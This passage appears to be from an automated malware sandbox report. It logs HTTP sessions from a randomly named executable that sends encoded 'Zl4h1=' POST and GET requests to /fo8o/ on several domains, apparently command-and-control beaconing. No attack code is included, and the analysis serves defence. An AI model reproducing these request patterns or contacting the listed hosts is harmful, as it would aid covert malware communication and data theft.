                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    19 | 192.168.2.11 | 49731 | 91.195.240.94 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:01:07.752844095 CEST | 1812 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.rssnewscast.com
                                                    Origin: http://www.rssnewscast.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 32 33 67 59 51 33 54 6c 48 6f 6c 65 44 6d 75 4b 79 67 64 33 61 75 7a 31 66 75 45 79 69 76 6e 59 69 4f 6d 6c 77 4e 56 45 4f 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 4f 65 63 43 6a 7a 4b 39 73 77 44 61 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 [TRUNCATED]
                                                    Data Ascii: Zl4h1=... [TRUNCATED]


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    20 | 192.168.2.11 | 49732 | 91.195.240.94 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:01:10.287750006 CEST | 507 | OUT | GET /fo8o/?Zl4h1=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.rssnewscast.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:01:11.175139904 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Sun, 09 Jun 2024 16:01:11 GMT
                                                    content-type: text/html; charset=UTF-8
                                                    transfer-encoding: chunked
                                                    vary: Accept-Encoding
                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    pragma: no-cache
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_UTC1KbQvDnBXOxP977o4eDiYjJxVkTrMz1KgVM4nmGCKy3HNEyC2jJQqk8cOymyieXG1d6ypKElJvltgnULZpQ==
                                                    last-modified: Sun, 09 Jun 2024 16:01:11 GMT
                                                    x-cache-miss-from: parking-7dd9875bc6-z8kst
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 55 54 43 31 4b 62 51 76 44 6e 42 58 4f 78 50 39 37 37 6f 34 65 44 69 59 6a 4a 78 56 6b 54 72 4d 7a 31 4b 67 56 4d 34 6e 6d 47 43 4b 79 33 48 4e 45 79 43 32 6a 4a 51 71 6b 38 63 4f 79 6d 79 69 65 58 47 31 64 36 79 70 4b 45 6c 4a 76 6c 74 67 6e 55 4c 5a 70 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                    Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_UTC1KbQvDnBXOxP977o4eDiYjJxVkTrMz1KgVM4nmGCKy3HNEyC2jJQqk8cOymyieXG1d6ypKElJvltgnULZpQ==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informati
                                                    Jun 9, 2024 18:01:11.175154924 CEST | 212 | IN | Data Raw: 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66
                                                    Data Ascii: on you’re looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchi576ng for!"><link rel="icon" type="
                                                    Jun 9, 2024 18:01:11.175173044 CEST | 1236 | IN | Data Raw: 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65 64 6f 5f 6c 6f 67 6f 2e 70 6e 67 22 0a 2f 3e 3c 73
                                                    Data Ascii: image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> .container-header__link{float:right;margin-right:100px;margin-bottom:15px;font-size:16px;color:#9a9494}.container-content{clear:both}/*! normalize.
                                                    Jun 9, 2024 18:01:11.175190926 CEST | 12 | IN | Data Raw: 69 64 64 65 6e 7d 62 75 74 74 6f 6e
                                                    Data Ascii: idden}button
                                                    Jun 9, 2024 18:01:11.175196886 CEST | 1236 | IN | Data Raw: 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a
                                                    Data Ascii: ,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button576,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:butt
                                                    Jun 9, 2024 18:01:11.175211906 CEST | 212 | IN | Data Raw: 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 36 32 36 32 36 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70
                                                    Data Ascii: ay:none}[hidden]{display:none}.announcement{background:#262626;text-align:center;padding:0 5px}.announcement p{color:#717171}.announcement a{color:#717171}.container-header{margin:0 auto 0 auto;text-align:center}
                                                    Jun 9, 2024 18:01:11.175220013 CEST | 1236 | IN | Data Raw: 2e 63 6f 6e 74 61 69 6e 65 72 2d 68 65 61 64 65 72 5f 5f 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72 3a 23 37 31 37 31 37 31 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 0d 0a 32 35 0d 0a 7b 6d 61 72 67 69 6e 3a 32 35 70 78 20 61 75 74 6f
                                                    Data Ascii: .container-header__content{color:#717171}.container-content25{margin:25px auto 20px auto;text-alig570n:center;background:url("//img.sedoparking.com/templates/bg/arrows-1-colors-3.png") #fbfbfb no-repeat center top;background-size:100%}
                                                    Timestamp: Jun 9, 2024 18:01:11.175234079 CEST | Bytes transferred: 1236 | Direction: IN
                                                    Data Ascii: ght:bold;text-decoration:underline;color:#0a48ff}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#000}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#0a48ff}.
                                                    Timestamp: Jun 9, 2024 18:01:11.175242901 CEST | Bytes transferred: 379 | Direction: IN
                                                    Data Ascii: tainer-buybox__content-text{font-size:12px}.container-buybox__content-link{color:#919da6}.container-buybox__content-link--no-decoration{text-decoration:none}.container-searchbox{margin-bottom:50px;text-align:center}.container-searchbox__conten
                                                    Timestamp: Jun 9, 2024 18:01:11.175319910 CEST | Bytes transferred: 1236 | Direction: IN
                                                    Data Ascii: box__input,.container-searchbox__button{border:0 none}.576container-searchbox__button{cursor:pointer;font-size:12px;margin-left:15px;border:0 none;padding:2px 8px;color:#638296}.container-disclaimer{text-align:center}.container-disclaimer_
                                                    Timestamp: Jun 9, 2024 18:01:11.180572033 CEST | Bytes transferred: 1236 | Direction: IN
                                                    Data Ascii: essage__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content576-interactive


                                                    Session ID: 21 | Source IP: 192.168.2.11 | Source Port: 49733 | Destination IP: 66.29.149.46 | Destination Port: 80 | PID: 6576
                                                    Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp: Jun 9, 2024 18:01:24.725614071 CEST | Bytes transferred: 779 | Direction: OUT
                                                    Data: POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.techchains.info
                                                    Origin: http://www.techchains.info
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.techchains.info/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Ascii: Zl4h1=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXJsq/cyB9KDILeR0c5HMjyG1C7WZhjPusfQ==
                                                    Timestamp: Jun 9, 2024 18:01:25.377434969 CEST | Bytes transferred: 637 | Direction: IN
                                                    Data: HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:25 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                    Session ID: 22 | Source IP: 192.168.2.11 | Source Port: 49734 | Destination IP: 66.29.149.46 | Destination Port: 80 | PID: 6576
                                                    Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp: Jun 9, 2024 18:01:27.478238106 CEST | Bytes transferred: 799 | Direction: OUT
                                                    Data: POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.techchains.info
                                                    Origin: http://www.techchains.info
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.techchains.info/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Ascii: Zl4h1=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xV9Avw4Rq+LlEVmLv4FBSomLeYrdnKjY/QQ=
                                                    Timestamp: Jun 9, 2024 18:01:28.142008066 CEST | Bytes transferred: 637 | Direction: IN
                                                    Data: HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:28 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                    Session ID: 23 | Source IP: 192.168.2.11 | Source Port: 49735 | Destination IP: 66.29.149.46 | Destination Port: 80 | PID: 6576
                                                    Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp: Jun 9, 2024 18:01:30.020436049 CEST | Bytes transferred: 1812 | Direction: OUT
                                                    Data: POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.techchains.info
                                                    Origin: http://www.techchains.info
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.techchains.info/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Timestamp: Jun 9, 2024 18:01:30.703097105 CEST | Bytes transferred: 637 | Direction: IN
                                                    Data: HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:30 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                    Session ID: 24 | Source IP: 192.168.2.11 | Source Port: 49736 | Destination IP: 66.29.149.46 | Destination Port: 80 | PID: 6576
                                                    Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp: Jun 9, 2024 18:01:32.551182032 CEST | Bytes transferred: 507 | Direction: OUT
                                                    Data: GET /fo8o/?Zl4h1=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa481lrDHTJpcFWPIOqV4sO7fmSS56YSbpU=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.techchains.info
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Timestamp: Jun 9, 2024 18:01:33.234950066 CEST | Bytes transferred: 652 | Direction: IN
                                                    Data: HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:33 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                    Session ID: 25 | Source IP: 192.168.2.11 | Source Port: 49737 | Destination IP: 195.110.124.133 | Destination Port: 80 | PID: 6576
                                                    Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp: Jun 9, 2024 18:01:38.365076065 CEST | Bytes transferred: 797 | Direction: OUT
                                                    Data: POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.elettrosistemista.zip
                                                    Origin: http://www.elettrosistemista.zip
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Ascii: Zl4h1=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCjj1Y3ocmANKA/WpsWdZtTizUpttGcr7ynw==
                                                    Timestamp: Jun 9, 2024 18:01:39.218137980 CEST | Bytes transferred: 367 | Direction: IN
                                                    Data: HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:39 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                    Session ID: 26 | Source IP: 192.168.2.11 | Source Port: 49738 | Destination IP: 195.110.124.133 | Destination Port: 80 | PID: 6576
                                                    Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp: Jun 9, 2024 18:01:40.892910004 CEST | Bytes transferred: 817 | Direction: OUT
                                                    Data: POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.elettrosistemista.zip
                                                    Origin: http://www.elettrosistemista.zip
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Ascii: Zl4h1=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qx7W9LM2Vae784H1JLwt6vrTiZqyLKGLypU=
                                                    Timestamp: Jun 9, 2024 18:01:41.741810083 CEST | Bytes transferred: 367 | Direction: IN
                                                    Data: HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:41 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                    Session ID: 27 | Source IP: 192.168.2.11 | Source Port: 49739 | Destination IP: 195.110.124.133 | Destination Port: 80 | PID: 6576
                                                    Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp: Jun 9, 2024 18:01:43.443393946 CEST | Bytes transferred: 1830 | Direction: OUT
                                                    Data: POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.elettrosistemista.zip
                                                    Origin: http://www.elettrosistemista.zip
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Timestamp: Jun 9, 2024 18:01:44.304589987 CEST | Bytes transferred: 367 | Direction: IN
                                                    Data: HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:44 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    28 | 192.168.2.11 | 49740 | 195.110.124.133 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:01:45.972829103 CEST | 513 | OUT | GET /fo8o/?Zl4h1=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.elettrosistemista.zip
                                                    Connection: close
